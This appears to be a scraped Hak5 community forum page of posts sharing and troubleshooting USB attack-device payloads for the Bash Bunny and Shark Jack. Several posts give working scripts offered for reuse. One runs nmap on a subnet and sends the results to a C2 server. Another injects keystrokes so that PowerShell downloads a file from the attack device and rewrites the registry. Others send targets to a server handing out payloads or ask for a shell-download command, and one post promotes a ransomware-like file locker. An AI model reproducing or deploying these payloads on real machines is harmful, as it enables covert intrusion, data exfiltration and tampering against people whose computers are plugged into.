please notify me.
  13. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server. #!/bin/bash # # Title: Custom Nmap Payload for Shark Jack # Author: Flatlinebb # Version: 1.02 # # Scans target subnet with Nmap using specified options. Saves each scan result # to loot storage folder. Uploads loot to your C2 server # # Red ...........Setup # Amber..........Scanning # Green..........Finished # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open" LOOT_DIR=/root/loot/nmap SCAN_DIR=/etc/shark/nmap function finish() { LED CLEANUP # Kill Nmap echo $1 wait $1 kill $1 &> /dev/null # Exfiltrate all loot files FILES="$LOOT_DIR/*.*" for f in $FILES; do C2EXFIL STRING $f $SUBNET; done # Sync filesystem echo $SCAN_M > $SCAN_FILE sync sleep 1 LED FINISH sleep 1 # Halt system halt } function setup() { LED SETUP # Create loot directory mkdir -p $LOOT_DIR &> /dev/null # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done # Create tmp scan directory mkdir -p $SCAN_DIR &> /dev/null # Create tmp scan file if it doesn't exist SCAN_FILE=$SCAN_DIR/scan-count if [ ! -f $SCAN_FILE ]; then touch $SCAN_FILE && echo 0 > $SCAN_FILE fi # Find IP address and subnet while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done } function find_subnet() { SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') } function run() { # Run setup setup SCAN_N=$(cat $SCAN_FILE) SCAN_M=$(( $SCAN_N + 1 )) LED ATTACK # Connect to Cloud C2 C2CONNECT # Wait until Cloud C2 connection is established while ! pgrep cc-client; do sleep 1; done # Start scan nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_$SCAN_M_`date +"%Y-%m-%d_%H%M%S"` &>/dev/null & tpid=$! sleep 1 finish $tpid } # Run payload run & Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  14. Link to github: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvments or changes.
  15. HoldEmUp Private Encryption Locker By REDD (aka Ar1k88) Fork from: https://github.com/private-locker/Private-Encrypted-Locker GitHub URL: https://github.com/private-locker/bashbunny-payloads/tree/master/payloads/library/general/HoldEmUp (Waiting on Official Hak5 Merge) This Script was previously released on here, then taken down. I had decided to release it on here again since we have also released the Source on our Community GitHub. Features: Use 256 AES Encryption to encrypt and secure files with a Uniquely Generated AES Key. Edit "settings.db" to change the file format of encrypted files. No need to 3rd Party Applications to hide documents. "How this was made? I saw how WannaCry and other Ransomware would "Hold You Hostage". So I decided to sit down, make a PoC (Proof of Concept) that quickly turned into a Security Tool that could be used to lock and unlock your own files. So I held onto the files, even released them for Hak5 as a Demo on the BashBunny, but quickly realized it had "Ransomware" qualities. I quickly removed it. But as times come to pass; Security is getting better. There's other Programmers besides myself that could benefit from this project. Prevent the next wave of "Ransomware". -REDD " DO NOT LOSE YOUR LOCKER KEY'S! NO KEY = NO DECRYPTING. YOU HAVE BEEN WARNED!
  16. Shanegal

    shane

    hey guys, so I had some trouble with the screaming payload of doom payload so ive adapted the wallpaper changer payload to do basically the same thing but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? can anyone help me with this please? Here is the script ive have made and ive attached the full payload at the bottom LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET HOST_IP GET SWITCH_POSITION udisk mount cd /root/udisk/payloads/$SWITCH_POSITION python -m SimpleHTTPServer 80 & LED ATTACK Q GUI r Q DELAY 500 Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" Q ENTER LED G SUCCESS s.wav screamer payload.txt
  17. In the spirit of april fools, I ported the original UnifiedRickRoll to windows, so you can easily switch between apple and windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  18. Hello, having received my new toy recently (bashbunny) : I tried to use some scripts like "wallpaper-changer-of-doom" except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested:) Affectionately, jcardonne
  19. Dear everyone, I am doing some experimenting with my new bash bunny and was wondering if once I enable an ATTACKMODE interface if it is possible to disable it after a little while without turning off the payload. For example I am trying ATTACKMODE HID STORAGE and then wondering if I can do something like DISABLE STORAGE or something of like that. I know to some of you this is probably going to seem like a stupid question but if anyone knows the answer can you please share. Thank you!!!
  20. Hallo!! This is my payload, just a python smb server thats points to the switch folder. PROBLEM: it creates the share, but i cant access the files, because the /root/udisk is not mounted. If i boot the bunny in RNDIS, goto the console and do "udisk mount" i can access the files, but I cant mount udisk from inside a payload Any ideas? Is there anything I'm missing. Thx, and keep on developing!! :) #!/bin/bash LED SETUP GET SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot LED STAGE1 ATTACKMODE RNDIS_ETHERNET udisk mount python /tools/impacket/examples/smbserver.py e $SWITCHDIR & LED FINISH
  21. sub0

    [PAYLOAD] AutoPwn

    Hello, I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript: DELAY 1000 ALT F2 DELAY 50 GUI SPACE GUI r DELAY 50 BACKSPACE DELAY 100 STRING http://10.10.0.53:8080/ ENTER This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with windows at all, been years since I used it (I'm a total linux nerd) so my powershell payload is probably terrible. I would welcome any and all improvements, ideas, etc. Thanks for reading! - sub0 autopwn.py
  22. Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it?
  23. Hello! I have a question. How to download shell from powershell (from win+r). Can someone write me a command to bunny?
  24. In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  25. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE. The way it works is the following: In the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create: Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state) If there is no lockscreen - then the Bash Bunny will run a HTTP server, and you can set the switch number from http:\\172.16.64.1 directly. If there is a lockscreen - then the Bash Bunny will simply increase the value of N incrementally by 1, i.e each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer, you can simply change the switch by repeatedly plugging it into a USB Power Bank (although this may take some time to reach switch6 as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times which isn't ideal in every situation) #!/bin/bash LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET TARGET_IP GET HOST_IP GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION if [ -z "${TARGET_IP}" ]; then LED FAIL2 exit 1 fi if [ ! -f Nswitch.txt ]; then echo 0 > Nswitch.txt fi LED STAGE1 #Detecting lockscreen tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping & # Windows OS specific, can change to RUN OSX or RUN UNITY RUN WIN ping $HOST_IP -n 1 sleep 1 if grep "ICMP" ping > /dev/null then echo 1 > lockscreen # Unlocked LED G DOUBLE #Try Captive portal to overcome some restrictions? python -m SimpleHTTPServer 80 & while ! nc -z localhost 80; do sleep 0.2; done else echo 0 > lockscreen # Locked LED R DOUBLE N=0; for i in `cat Nswitch.txt`; do N=$((1 + $i)); done; echo $N > Nswitch.txt fi cp /root/udisk/payloads/switch$N /root/udisk/payloads/switch1 with <form name=”web_form” id=”web_form” method=”post” action=”post.php”> <p><label>Nswitch:</label><input type=”number” name=”N” id=”N” /></p> <input type="submit" value="Ammend"> </form> and <?php $N = $_POST[‘N’]; $fp = fopen(”Nswitch.txt”, “a”); $savestring = $N; fwrite($savestring); fclose($fp); ?> It still isn't complete yet but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first but this has been mostly resolved, I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better.
×
×
  • Create New...